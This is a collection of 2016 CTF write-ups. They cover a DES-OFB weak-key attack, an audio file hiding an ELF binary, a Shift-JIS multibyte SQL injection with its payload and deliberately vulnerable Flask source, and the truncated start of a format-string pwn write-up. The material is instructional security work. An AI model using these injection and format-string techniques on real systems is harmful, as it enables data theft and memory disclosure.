-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Crypto/des-ofb/Images/601px-OFB_decryption.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Crypto/des-ofb/Readme.md: -------------------------------------------------------------------------------- 1 | #des-ofb 2 | 3 | **Category:** Crypto 4 | **Points:** 2 5 | **Description:** 6 | 7 | Decrypt the message, find the flag, and then marvel at how broken everything is. 8 | 9 | ##Write-up 10 | To start we are provided with two items, a copy of the ciphertext and the following python script. 11 | 12 | ```python 13 | from Crypto.Cipher import DES 14 | 15 | f = open('key.txt', 'r') 16 | key_hex = f.readline()[:-1] # discard newline 17 | f.close() 18 | KEY = key_hex.decode("hex") 19 | IV = '13245678' 20 | a = DES.new(KEY, DES.MODE_OFB, IV) 21 | 22 | f = open('plaintext', 'r') 23 | plaintext = f.read() 24 | f.close() 25 | 26 | ciphertext = a.encrypt(plaintext) 27 | f = open('ciphertext', 'w') 28 | f.write(ciphertext) 29 | f.close() 30 | ``` 31 | 32 | A quick glance at the code (and the challenge title) tells us that we're dealing with Data Encryption Standard (DES) utilizing Output Feedback (OFB) mode. We can also see in the code that we already have the Initialization Vector (IV) used for encryption ```IV = '13245678'```. A quick refresher on OFB shows that the decryption process envolves the ```IV``` and ```key``` being encrypted and then XORed with the ```ciphertext``` to return our ```plaintext```. 33 | 34 | ![Image of OFB] 35 | (./Images/601px-OFB_decryption.png) 36 | 37 | I know it's obvious, but for the sake of trying to write a thorough write-up I'll say it. Since we know the ```IV``` and ```ciphertext``` already, the last piece that we need to decrypt the message is the ```key``` itself. 
My first thought was just to try and bruteforce the key outright with the following script. 38 | 39 | ```python 40 | from Crypto.Cipher import DES 41 | 42 | def is_ascii(s): 43 | return all(ord(c) < 128 for c in s) 44 | def ByteToHex( byteStr ): 45 | return ''.join( [ "%02X" % ord( x ) for x in byteStr ] ).strip() 46 | 47 | f = open('ciphertext', 'r') 48 | ciphertext = f.read() 49 | f.close() 50 | i=0 51 | IV = '13245678' 52 | bites = ['\x00', '\x01', '\x02', '\x03', '\x04', '\x05', '\x06', '\x07', '\x08', '\x09', '\x0A', '\x0B', '\x0C', '\x0D', '\x0E', '\x0F', '\x10', '\x11', '\x12', '\x13', '\x14', '\x15', '\x16', '\x17', '\x18', '\x19', '\x1A', '\x1B', '\x1C', '\x1D', '\x1E', '\x1F', '\x20', '\x21', '\x22', '\x23', '\x24', '\x25', '\x26', '\x27', '\x28', '\x29', '\x2A', '\x2B', '\x2C', '\x2D', '\x2E', '\x2F', '\x30', '\x31', '\x32', '\x33', '\x34', '\x35', '\x36', '\x37', '\x38', '\x39', '\x3A', '\x3B', '\x3C', '\x3D', '\x3E', '\x3F', '\x40', '\x41', '\x42', '\x43', '\x44', '\x45', '\x46', '\x47', '\x48', '\x49', '\x4A', '\x4B', '\x4C', '\x4D', '\x4E', '\x4F', '\x50', '\x51', '\x52', '\x53', '\x54', '\x55', '\x56', '\x57', '\x58', '\x59', '\x5A', '\x5B', '\x5C', '\x5D', '\x5E', '\x5F', '\x60', '\x61', '\x62', '\x63', '\x64', '\x65', '\x66', '\x67', '\x68', '\x69', '\x6A', '\x6B', '\x6C', '\x6D', '\x6E', '\x6F', '\x70', '\x71', '\x72', '\x73', '\x74', '\x75', '\x76', '\x77', '\x78', '\x79', '\x7A', '\x7B', '\x7C', '\x7D', '\x7E', '\x7F', '\x80', '\x81', '\x82', '\x83', '\x84', '\x85', '\x86', '\x87', '\x88', '\x89', '\x8A', '\x8B', '\x8C', '\x8D', '\x8E', '\x8F', '\x90', '\x91', '\x92', '\x93', '\x94', '\x95', '\x96', '\x97', '\x98', '\x99', '\x9A', '\x9B', '\x9C', '\x9D', '\x9E', '\x9F', '\xA0', '\xA1', '\xA2', '\xA3', '\xA4', '\xA5', '\xA6', '\xA7', '\xA8', '\xA9', '\xAA', '\xAB', '\xAC', '\xAD', '\xAE', '\xAF', '\xB0', '\xB1', '\xB2', '\xB3', '\xB4', '\xB5', '\xB6', '\xB7', '\xB8', '\xB9', '\xBA', '\xBB', '\xBC', '\xBD', '\xBE', '\xBF', '\xC0', '\xC1', '\xC2', 
'\xC3', '\xC4', '\xC5', '\xC6', '\xC7', '\xC8', '\xC9', '\xCA', '\xCB', '\xCC', '\xCD', '\xCE', '\xCF', '\xD0', '\xD1', '\xD2', '\xD3', '\xD4', '\xD5', '\xD6', '\xD7', '\xD8', '\xD9', '\xDA', '\xDB', '\xDC', '\xDD', '\xDE', '\xDF', '\xE0', '\xE1', '\xE2', '\xE3', '\xE4', '\xE5', '\xE6', '\xE7', '\xE8', '\xE9', '\xEA', '\xEB', '\xEC', '\xED', '\xEE', '\xEF', '\xF0', '\xF1', '\xF2', '\xF3', '\xF4', '\xF5', '\xF6', '\xF7', '\xF8', '\xF9', '\xFA', '\xFB', '\xFC', '\xFD', '\xFE'] 53 | for bite1 in bites: 54 | for bite2 in bites: 55 | for bite3 in bites: 56 | for bite4 in bites: 57 | for bite5 in bites: 58 | for bite6 in bites: 59 | for bite7 in bites: 60 | for bite8 in bites: 61 | KEY=b''.join([bite1,bite2,bite3,bite4,bite5,bite6,bite7,bite8]) 62 | a = DES.new(KEY, DES.MODE_OFB, IV) 63 | plaintext = a.decrypt(ciphertext) 64 | if is_ascii(plaintext): 65 | print ByteToHex(KEY)+":"+plaintext 66 | ``` 67 | 68 | I should have realized just from the keyspace, but after a few minutes of bruteforcing it was obvious that this was not going to finish during the CTF, current month, or possibly the current year. I took a step back and looked a little deeper into DES and OFB together. I quickly came across an [article](http://crypto.stackexchange.com/questions/7938/may-the-problem-with-des-using-ofb-mode-be-generalized-for-all-feistel-ciphers) on ```crypto.stackexchange.com``` that proved to be very helpful. From the exchange of information there are a few key (no pun intended) pieces of information here. Namely the following: 69 | 70 | >That is correct as that is the definition of a DES weak key, a key for which encryption and decryption have the same effect. 71 | 72 | and 73 | 74 | >The output of every other blockcipher call would be the original IV which is assumed to be public knowledge, so the attacker can decrypt every other block w/o knowing the key. Further more the odd numbered blocks (if we start our numbering with 1) will all be encrypted with the same keystream. 
So that is a weakness in and of itself. But, even more so, since there are only 4 weak keys, the attacker can surely figure out the odd numbered blocks too (once he knows a weak key was used). 75 | 76 | This sounded perfect, but I didn't exactly know what the definition of a weak key was. With a little more help from Google I found an [article](https://en.wikipedia.org/wiki/Weak_key) that directly called out weak keys for DES. In it we find the following 4 weak keys: 77 | 78 | ``` 79 | 0x0000000000000000 80 | 0xFFFFFFFFFFFFFFFF 81 | 0xE1E1E1E1F0F0F0F0 82 | 0x1E1E1E1E0F0F0F0F 83 | ``` 84 | 85 | Using this information I went back and edited my initial brute force script to only use the following keys. 86 | 87 | ```python 88 | from Crypto.Cipher import DES 89 | 90 | f = open('ciphertext', 'r') 91 | ciphertext = f.read() 92 | f.close() 93 | IV = '13245678' 94 | KEY=b'\x00\x00\x00\x00\x00\x00\x00\x00' 95 | a = DES.new(KEY, DES.MODE_OFB, IV) 96 | plaintext = a.decrypt(ciphertext) 97 | print plaintext 98 | 99 | KEY=b'\x1E\x1E\x1E\x1E\x0F\x0F\x0F\x0F' 100 | a = DES.new(KEY, DES.MODE_OFB, IV) 101 | plaintext = a.decrypt(ciphertext) 102 | print plaintext 103 | 104 | KEY="\xE1\xE1\xE1\xE1\xF0\xF0\xF0\xF0" 105 | a = DES.new(KEY, DES.MODE_OFB, IV) 106 | plaintext = a.decrypt(ciphertext) 107 | print plaintext 108 | 109 | KEY="\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" 110 | a = DES.new(KEY, DES.MODE_OFB, IV) 111 | plaintext = a.decrypt(ciphertext) 112 | print plaintext 113 | ``` 114 | 115 | From the output we find the the decrypted plaintext. 116 | 117 | ``` 118 | To be, or not to be, that is the question: 119 | Whether 'tis Nobler in the mind to suffer 120 | The Slings and Arrows of outrageous Fortune, 121 | Or to take Arms against a Sea of troubles, 122 | And by opposing end them: to die, to sleep 123 | No more; and by a sleep, to say we end 124 | The Heart-ache, and the thousand Natural shocks 125 | That Flesh is heir to? 'Tis a consummation 126 | Devoutly to be wished. 
To die, to sleep, 127 | To sleep, perchance to Dream; aye, there's the rub, 128 | For in that sleep of death, what dreams may come, 129 | When we have shuffled off this mortal coil, 130 | Must give us pause. There's the respect 131 | That makes Calamity of so long life: 132 | For who would bear the Whips and Scorns of time, 133 | The Oppressor's wrong, the proud man's Contumely, 134 | The pangs of despised Love, the Law’s delay, 135 | The insolence of Office, and the Spurns 136 | That patient merit of the unworthy takes, 137 | When he himself might his Quietus make 138 | With a bare Bodkin? Who would Fardels bear, 139 | To grunt and sweat under a weary life, 140 | But that the dread of something after death, 141 | The undiscovered Country, from whose bourn 142 | No Traveller returns, Puzzles the will, 143 | And makes us rather bear those ills we have, 144 | Than fly to others that we know not of. 145 | Thus Conscience does make Cowards of us all, 146 | And thus the Native hue of Resolution 147 | Is sicklied o'er, with the pale cast of Thought, 148 | And enterprises of great pitch and moment, 149 | With this regard their Currents turn awry, 150 | And lose the name of Action. Soft you now, 151 | The fair Ophelia? Nymph, in thy Orisons 152 | Be all my sins remembered. BKPCTF{so_its_just_a_short_repeating_otp!} 153 | ``` 154 | 155 | We did recover the flag ```BKPCTF{so_its_just_a_short_repeating_otp!}```, but we should hold true to the description and marvel at how broken everything is. To that effect, I've included the output of one of the incorrect weak keys. It's amazing how much you can see without actually having the correct decryption key. 156 | 157 | ``` 158 | g?䲕??or not to??????at is the??????on: 159 | WhethV?????? Nobler i]స???ind to suU??????e Slings R?????ows of ouG??????s Fortuneʋ???? take Arm@ॷ???st a Sea \?䤂??bles, 160 | And?????osing end??????to die, t\෼??? 161 | No more;?????? a sleep,?????? we end 162 | T[?䘕??t-ache, a]?䤘?thousand }?????? 
shocks 163 | T[?????sh is heiAిϤ?Tis a con@??????on 164 | Devout_?䤟??e wished.?????, to sleeC?΄???leep, perP?????to Dream;???ܤ?here's thVඥ???For in thR?䣜??p of deat[?䧘?? dreams mR?䳟??, 165 | When we??????huffled oU?䤘?? mortal c\??????st give u@റ???. There's??????spect 166 | ThaGੱ??? Calamity?????long life ʂ????ho would Q??????e Whips a]?䃓??ns of timV?΄??Oppressor?䧂??g, the pr\?????'s ContumV??????e pangs oU࠵???sed Love,??????w’s delR??ڤ?? insolencV૶???fice, and??????urns 167 | That??????t merit oUస???nworthy tR???܎?hen he hi^??????ight his b?????? make 168 | Wit[????e Bodkin???????uld Farde_?䲕??, 169 | To grunGॾ???weat undeA?????ry life, 170 | q??????t the dreR?俖??omething R??????eath, 171 | The??????overed CoF??????from whosVি??? 172 | No Trave_??????turns, PuI??????he will, 173 | r?????es us rat[?????r those i_?????have, 174 | Tha]ࢼ???o others G?????? know not??????us ConsciV??????es make C\??????of us allʅ????hus the NR??????ue of Res\?????? 175 | Is sicklZ????r, with t[?䠑?? cast of g??????, 176 | And entV??????s of greaGഹ??? and mome]??ڧ??h this reT??????eir Curre]??????n awry, 177 | A]?伟?? the name?????ion. Soft??????w, 178 | The faZ?䟀??lia? Nymp[?乞??hy Orison@ʆ????l my sins??????ered. BKPp??????its_just_R??????_repeatinT?????? 
179 | ``` 180 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Crypto/des-ofb/ciphertext: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Crypto/des-ofb/ciphertext -------------------------------------------------------------------------------- /2016/BostonKeyParty/Misc/lily/Images/lily.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Misc/lily/Images/lily.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Misc/lily/Readme.md: -------------------------------------------------------------------------------- 1 | #lily.flac 2 | 3 | **Category:** Misc 4 | **Points:** 2 5 | **Description:** 6 | 7 | more than just a few bleebs ;) 8 | 9 | ##Write-up 10 | In this challege we were provided with an [flac](./lily.flac) audio file. After listening to the file, we opened it up with ```audacity``` and tried to look for any hidden messages or patterns. 11 | 12 | ![Spectrogram](./Images/lily.png) 13 | 14 | After hours and hours of messing with this file we finally turned too other writeups for some clues. As it turns out the noise in the begining is really the header of an ELF file. If we use ```sox``` to strip off the flac headers and look at the file type we will see that it is indeed just a binary. Modify the permissions and executing the binary yields the flag. 
15 | 16 | ``` 17 | root@kali:~# sox lily.flac lily.raw 18 | root@kali:~# file lily.raw 19 | lily.raw: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d089edfc986a3cbdb64e3d9c65717a5f4209e13f, not stripped 20 | root@kali:~# chmod +x lily.raw 21 | root@kali:~# ./lily.raw 22 | BKPCTF{hype for a Merzbow/FSF collab album??} 23 | ``` 24 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Misc/lily/lily.flac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Misc/lily/lily.flac -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Images/monty.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/Images/monty.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Images/sjis-kgo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/Images/sjis-kgo.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/Images/sjis-request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/Images/sjis-request.png -------------------------------------------------------------------------------- 
/2016/BostonKeyParty/Web/Good Morning/Readme.md: -------------------------------------------------------------------------------- 1 | #Good Morning 2 | 3 | **Category:** Web 4 | **Points:** 3 5 | **Description:** 6 | 7 | https://s3.amazonaws.com/bostonkeyparty/2016/bffb53340f566aef7c4169d6b74bbe01be56ad18.tgz 8 | 9 | ##Write-up 10 | An initial visit to the site provided a familiar question set from the movie ```Monty Python and the Holy Grail```. They were: 11 | * What is your name? 12 | * What is your quest? 13 | * What is your favourite color? 14 | 15 | ![Question](./Images/monty.png) 16 | 17 | The Japanese theme also stands out throughout the site. 18 | 19 | A quick look at the [source code](./release) reveals a ```websocket``` that communicates through ```json``` requests. 20 | 21 | ```python 22 | def process_questsions(ws): 23 | i = 0 24 | conn = MySQLdb.connect(**connect_params) 25 | with conn as cursor: 26 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 27 | while not ws.closed: 28 | message = ws.receive() 29 | if not message: continue 30 | message = json.loads(message) 31 | if message["type"] == "answer": 32 | question = mysql_escape(questions[i]) 33 | answer = mysql_escape(message["answer"]) 34 | cursor.execute('INSERT INTO answers (question, answer) VALUES ("%s", "%s")' % (question, answer)) 35 | conn.commit() 36 | i += 1 37 | if i < len(questions): 38 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 39 | elif message["type"] == "get_answer": 40 | question = mysql_escape(message["question"]) 41 | answer = mysql_escape(message["answer"]) 42 | cursor.execute('SELECT * FROM answers WHERE question="%s" AND answer="%s"' % (question, answer)) 43 | ws.send(json.dumps({"type": "got_answer", "row": cursor.fetchone()})) 44 | print message 45 | ``` 46 | 47 | ```javascript 48 | $("#prompt-input input").keyup(function(event) { 49 | if (event.keyCode != 13) { return; } // 
enter 50 | var answer = $(this).val(); 51 | socket.send(JSON.stringify({"type": "answer", "answer": answer })); 52 | if (last) { 53 | socket.send(JSON.stringify({"type": "get_answer", "question": question, "answer": answer})); 54 | } 55 | }); 56 | ``` 57 | 58 | After the initial question sequence there was a ```get_answer``` request that was followed by a ```got_answer``` response. This ```get_answer``` request effectively let you query the database with the following query: 59 | 60 | ```sql 61 | SELECT * FROM answers WHERE question="%s" AND answer="%s 62 | ``` 63 | 64 | It seemed obvious from this that we need to bypass the ```WHERE``` clause with a SQLi to dump the database and the flag itself. However, it is also important to note that there was an escape routine present that thwarted our best efforts for standard SQLi style attacks. 65 | 66 | ```python 67 | MYSQL_SPECIAL_CHARS = [ 68 | ("\\", "\\\\"), 69 | ("\0", "\\0"), 70 | ("\n", "\\n"), 71 | ("\r", "\\r"), 72 | ("'", "\\'"), 73 | ('"', '\\"'), 74 | ("\x1a", "\\Z"), 75 | ] 76 | def mysql_escape(s): 77 | for find, replace in MYSQL_SPECIAL_CHARS: 78 | s = s.replace(find, replace) 79 | return s 80 | ``` 81 | 82 | A lot of time was spent trying to bypass these filters until a team member pointed out the charset being directly set in the code. 83 | 84 | ```python 85 | Response.charset = "shift-jis" 86 | connect_params["charset"] = "sjis" 87 | ``` 88 | 89 | A quick research of the charset revealed that it should be succeptible to a SQLi through a multibyte character. The multibyte attack works when a multibyte character is split into two separate bytes (because of a mismatch of character sets) and is used to manipulate the backend values. In this case, we needed a way to escape a double quote in order to successfully inject into the query. I spent hours trying different characters like ```葜``` to no avail. 
The thought was that by injecting ```葜\" or 1=1#``` it would split the Japanese character and the last byte of that character would turn into another ```\``` leaving us effectively with ```\\" or 1=1#```. The idea was actually spot on, but unfortunately we didn't find the correct character in time. It turns out we were focusing on the more complex characters when ¥ (0x005c) would have done the job. The injection would then be ```¥\" or 1=1#``` which again would be translated into ```\\" or 1=1#```. This injection actually was quite nice, we were able to escape the original double quote as to not screw up our ```json``` request, but on the backend, our ```\``` was escaped with another ```\``` that manifested out of the multibyte character. In the end the request did in fact spit out the flag as it was the first record in the database. 90 | 91 | ![flag](./Images/sjis-request.png) 92 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/ganbatte.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from flask import Flask, render_template, Response 4 | from flask_sockets import Sockets 5 | import json 6 | import MySQLdb 7 | 8 | app = Flask(__name__) 9 | sockets = Sockets(app) 10 | 11 | with open("config.json") as f: 12 | connect_params = json.load(f) 13 | 14 | connect_params["db"] = "ganbatte" 15 | 16 | # Use Shift-JIS for everything so it uses less bytes 17 | Response.charset = "shift-jis" 18 | connect_params["charset"] = "sjis" 19 | 20 | questions = [ 21 | "name", 22 | "quest", 23 | "favorite color", 24 | ] 25 | 26 | # List from http://php.net/manual/en/function.mysql-real-escape-string.php 27 | MYSQL_SPECIAL_CHARS = [ 28 | ("\\", "\\\\"), 29 | ("\0", "\\0"), 30 | ("\n", "\\n"), 31 | ("\r", "\\r"), 32 | ("'", "\\'"), 33 | ('"', '\\"'), 34 | ("\x1a", "\\Z"), 35 | ] 36 | def mysql_escape(s): 37 | for find, replace in 
MYSQL_SPECIAL_CHARS: 38 | s = s.replace(find, replace) 39 | return s 40 | 41 | @sockets.route('/ws') 42 | def process_questsions(ws): 43 | i = 0 44 | conn = MySQLdb.connect(**connect_params) 45 | with conn as cursor: 46 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 47 | while not ws.closed: 48 | message = ws.receive() 49 | if not message: continue 50 | message = json.loads(message) 51 | if message["type"] == "answer": 52 | question = mysql_escape(questions[i]) 53 | answer = mysql_escape(message["answer"]) 54 | cursor.execute('INSERT INTO answers (question, answer) VALUES ("%s", "%s")' % (question, answer)) 55 | conn.commit() 56 | i += 1 57 | if i < len(questions): 58 | ws.send(json.dumps({"type": "question", "topic": questions[i], "last": i == len(questions)-1})) 59 | elif message["type"] == "get_answer": 60 | question = mysql_escape(message["question"]) 61 | answer = mysql_escape(message["answer"]) 62 | cursor.execute('SELECT * FROM answers WHERE question="%s" AND answer="%s"' % (question, answer)) 63 | ws.send(json.dumps({"type": "got_answer", "row": cursor.fetchone()})) 64 | print message 65 | 66 | @app.route('/') 67 | def hello(): 68 | return app.send_static_file("index.html") 69 | 70 | if __name__ == "__main__": 71 | from gevent import pywsgi 72 | from geventwebsocket.handler import WebSocketHandler 73 | addr = ('localhost', 5000) 74 | 75 | server = pywsgi.WSGIServer(addr, app, handler_class=WebSocketHandler) 76 | server.serve_forever() 77 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==0.10.1 2 | Flask-Sockets==0.2.0 3 | Jinja2==2.8 4 | MarkupSafe==0.23 5 | MySQL-python==1.2.5 6 | Werkzeug==0.11.4 7 | argparse==1.2.1 8 | gevent==1.0.2 9 | gevent-websocket==0.9.5 10 | greenlet==0.4.9 11 | itsdangerous==0.24 12 | 
wsgiref==0.1.2 13 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/release/static/favicon.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/ganbatte-mayoi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/release/static/ganbatte-mayoi.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Web/Good Morning/release/static/index.html -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/questions.js: -------------------------------------------------------------------------------- 1 | var frames_template = [ 2 | "What", 3 | ".", 4 | ".", 5 | ".", 6 | " is", 7 | " your ", 8 | -1, 9 | "?", 10 | ]; 11 | 12 | var set_question = function(topic) { 13 | var prompt = $("#prompt"); 14 | var prompt_input = $("#prompt-input input"); 15 | 16 | var frames = []; 17 | 18 | for (var i = 0; i < frames_template.length; i++) { 19 | if (frames_template[i] == -1) { 20 | frames.push(topic); 21 | } else { 22 | frames.push(frames_template[i]); 23 | } 24 | } 25 | 26 | prompt.text(""); 27 | prompt_input.val(""); 28 | prompt_input.prop('disabled', true); 29 | 30 | 
var frame = 0; 31 | var interval = setInterval(function() { 32 | if (frame >= frames.length) { 33 | clearInterval(interval); 34 | prompt_input.prop('disabled', false).focus(); 35 | return; 36 | } 37 | prompt.text(prompt.text() + frames[frame]); 38 | frame += 1; 39 | }, 500); 40 | } 41 | 42 | var survey_done = function(user_num) { 43 | $("#prompt").text("Thanks for taking our survey!").append($("
")).append("You were user number " + user_num); 44 | $("#prompt-input").hide(); 45 | } 46 | 47 | var socket = new WebSocket("ws://" + document.location.host + "/ws"); 48 | 49 | $(function() { 50 | var question = ""; 51 | var last = false; 52 | 53 | socket.onmessage = function(event) { 54 | var msg = JSON.parse(event.data); 55 | if (msg["type"] == "question") { 56 | question = msg["topic"]; 57 | last = msg["last"]; 58 | set_question(msg["topic"]); 59 | } else if (msg["type"] == "got_answer") { 60 | survey_done(Math.floor(msg["row"][0] / 3)) 61 | } 62 | }; 63 | 64 | $("#prompt-input input").keyup(function(event) { 65 | if (event.keyCode != 13) { return; } // enter 66 | var answer = $(this).val(); 67 | socket.send(JSON.stringify({"type": "answer", "answer": answer })); 68 | if (last) { 69 | socket.send(JSON.stringify({"type": "get_answer", "question": question, "answer": answer})); 70 | } 71 | }); 72 | 73 | }); 74 | -------------------------------------------------------------------------------- /2016/BostonKeyParty/Web/Good Morning/release/static/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | /* This challenge would not have been possible without the help of waifu2x */ 3 | background: url(/static/ganbatte-mayoi.png) no-repeat center center fixed; 4 | background-size: cover; 5 | } 6 | h1,h2 { 7 | color: #9AE1A8; 8 | text-shadow: 1px 1px 0 #000, 9 | -1px 1px 0 #000, 10 | 1px -1px 0 #000, 11 | -1px -1px 0 #000, 12 | 0px 1px 0 #000, 13 | 0px -1px 0 #000, 14 | -1px 0px 0 #000, 15 | 1px 0px 0 #000, 16 | 2px 2px 0 #000, 17 | -2px 2px 0 #000, 18 | 2px -2px 0 #000, 19 | -2px -2px 0 #000, 20 | 0px 2px 0 #000, 21 | 0px -2px 0 #000, 22 | -2px 0px 0 #000, 23 | 2px 0px 0 #000, 24 | 1px 2px 0 #000, 25 | -1px 2px 0 #000, 26 | 1px -2px 0 #000, 27 | -1px -2px 0 #000, 28 | 2px 1px 0 #000, 29 | -2px 1px 0 #000, 30 | 2px -1px 0 #000, 31 | -2px -1px 0 #000; 32 | } 33 | @keyframes obnoxious_text1 { 34 | from { 35 | opacity: 1; 36 
| font-size: 600%; 37 | } 38 | to { 39 | opacity: 0.5; 40 | font-size: 550%; 41 | } 42 | } 43 | 44 | h1 { 45 | width: 100%; 46 | font-size: 600%; 47 | position: fixed; 48 | top: 5%; 49 | left: 5%; 50 | margin: 0px; 51 | animation: 0.7s cubic-bezier(0.25,0.1,0.25,1) 0s infinite alternate obnoxious_text1; 52 | } 53 | 54 | @keyframes obnoxious_text2 { 55 | from { 56 | opacity: 1; 57 | font-size: 350%; 58 | } 59 | to { 60 | opacity: 0.5; 61 | font-size: 320%; 62 | } 63 | } 64 | 65 | h2 { 66 | text-align: right; 67 | position: absolute; 68 | right: 10%; 69 | bottom: 10%; 70 | margin: 0px; 71 | font-size: 350%; 72 | animation: 0.8s cubic-bezier(0.25,0.1,0.25,1) 0.2s infinite alternate obnoxious_text2; 73 | } 74 | 75 | #prompt-container { 76 | position: absolute; 77 | top: 50%; 78 | left: 50%; 79 | transform: translate(-50%, -50%); 80 | border: 1px solid #000; 81 | background-color: rgba(255, 255, 255, 0.9); 82 | border-radius: 25px; 83 | padding: 20px; 84 | box-sizing: border-box; 85 | font-family: sans-serif; 86 | } 87 | 88 | #prompt { 89 | text-align: center; 90 | font-weight: bold; 91 | font-size: 2em; 92 | } 93 | 94 | #prompt-input { 95 | margin-top: 0.5em; 96 | text-align: center; 97 | } 98 | 99 | #prompt-input input { 100 | width: 100%; 101 | box-sizing: border-box; 102 | font-size: 2em; 103 | text-align: center; 104 | opacity: 0.8; 105 | border: 1px solid #333; 106 | padding: 0.2em; 107 | } 108 | 109 | #prompt-input input[disabled] { 110 | background-color: #ccc; 111 | } 112 | -------------------------------------------------------------------------------- /2016/IceCTF/Stage_2/DearDiary/Readme.md: -------------------------------------------------------------------------------- 1 | #Dear Diary 2 | 3 | **Category:** Pwn 4 | **Points:** 60 5 | **Description:** 6 | 7 | We all want to keep our secrets secure and what is more important than our precious diary entries? 
We made this highly secure diary service that is sure to keep all your boy crushes and edgy poems safe from your parents. nc diary.vuln.icec.tf 6501 [download file](./deardiary) 8 | 9 | ##Write-up 10 | Initially we run the binary and see what kind of functionality exists within it. 11 | 12 | ``` 13 | root@kali:~# ./deardiary 14 | -- Diary 3000 -- 15 | 16 | 1. add entry 17 | 2. print latest entry 18 | 3. quit 19 | > 1 20 | Tell me all your secrets: Hello World! 21 | 22 | 1. add entry 23 | 2. print latest entry 24 | 3. quit 25 | > 2 26 | Hello World! 27 | 28 | 1. add entry 29 | 2. print latest entry 30 | 3. quit 31 | > 3 32 | ``` 33 | 34 | Ok, looks pretty simple. We supply some data and we can request that this data is then printed back out to us. Let's try a format string and see what it does. 35 | 36 | ``` 37 | root@kali:~# python -c 'print "1\nAAAA"+"%08x."*10+"\n2\n3\n"'| ./deardiary 38 | -- Diary 3000 -- 39 | 40 | 1. add entry 41 | 2. print latest entry 42 | 3. quit 43 | > Tell me all your secrets: 44 | 1. add entry 45 | 2. print latest entry 46 | 3. quit 47 | > AAAAf755b7b6.f76cf000.ffa00f98.ffa02398.00000000.0000000a.4eedee00.00000000.00000000.ffa023a8. 48 | 49 | 1. add entry 50 | 2. print latest entry 51 | 3. quit 52 | ``` 53 | 54 | Well, it definitely looks like we are dealing with a format string issue as we are dumping memory out: every ```%08x``` pulled another dword off the stack, which only happens when our entry is handed to a printf-family function as the format string itself instead of being printed through a fixed ```"%s"``` format. Also, note that the command I am using along with the format string syntax is set up to move through the menu of the binary by itself. It lets me write a payload, read the payload back, and exit the program without any interaction. Now, let's dump a little more and see if we can see our "AAAA"s. 55 | 56 | ``` 57 | root@kali:~# python -c 'print "1\nAAAA"+"%08x."*20+"\n2\n3\n"'| ./deardiary 58 | -- Diary 3000 -- 59 | 60 | 1. add entry 61 | 2. print latest entry 62 | 3. quit 63 | > Tell me all your secrets: 64 | 1. add entry 65 | 2. print latest entry 66 | 3. 
